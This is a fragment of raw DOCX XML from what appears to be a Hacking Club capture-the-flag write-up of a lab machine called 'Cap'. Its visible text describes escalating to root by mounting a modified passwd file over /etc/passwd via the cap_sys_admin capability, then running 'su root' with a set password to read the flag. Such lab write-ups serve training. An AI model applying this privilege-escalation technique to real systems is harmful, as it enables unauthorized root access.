      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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006600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69" name="image11.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image11.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2006600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3543300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3543300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We mount our modified passwd file over </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_sys_admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">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565400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2565400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter the password we created </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vert16xx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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2552700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2552700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">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Now we are root, and we can read the final flag located in the root user’s directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">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3048000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68" name="image30.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image30.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="594360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065">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId40" w:type="default"/>
      <w:headerReference r:id="rId41" w:type="first"/>
      <w:headerReference r:id="rId42" w:type="even"/>
      <w:footerReference r:id="rId43" w:type="default"/>
      <w:footerReference r:id="rId44" w:type="first"/>
      <w:footerReference r:id="rId45" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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IBM Plex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IBM Plex Sans SemiBold">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C">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:pBdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289" w:firstLine="1276"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:shd w:fill="9a309b" w:val="clear"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2026 Hacking Club | All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                          Page </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>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D">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E">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6">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="12"/>
    <w:bookmarkEnd w:id="12"/>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-866769</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="76" name="image16.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image16.jpg"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="28627" l="0" r="-7644" t="36271"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="719138" cy="232221"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.2459055118110236pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image2.png"/>
        </v:shape>
      </w:pic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A">
    <w:pPr>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-942969</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="54" name="image1.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="8816" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7820025" cy="10085729"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>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-349240</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5767071</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6696075" cy="3009472"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="52" name=""/>
              <a:graphic>
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:cNvPr id="2" name="Shape 2"/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="2390550" y="2454150"/>
                        <a:ext cx="5910900" cy="2651700"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
                          <w:pPr>
                            <w:spacing w:after="120" w:before="480" w:line="275.9999942779541"/>
                            <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                            <w:jc w:val="center"/>
                            <w:textDirection w:val="btLr"/>
                          </w:pPr>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Writeup - </w:t>
                          </w:r>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Cap</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr anchorCtr="0" anchor="ctr"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-349240</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5767071</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6696075" cy="3009472"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="52" name="image31.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image31.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6696075" cy="3009472"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect"/>
                      <a:ln/>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Fallback>
      </mc:AlternateContent>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B">
    <w:pPr>
      <w:pBdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4252"/>
        <w:tab w:val="right" w:leader="none" w:pos="8504"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:center;mso-position-vertical-relative:margin;mso-position-vertical:center;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId1" o:title="image2.png"/>
        </v:shape>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Normal" w:default="1">
    <w:name w:val="normal"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableNormal" w:default="1">
    <w:name w:val="Table Normal"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="320" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>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eader" Target="header1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.urlencode.org/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.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9.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.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7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/20" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#cap_sys_admin" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/quickhits.txt" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 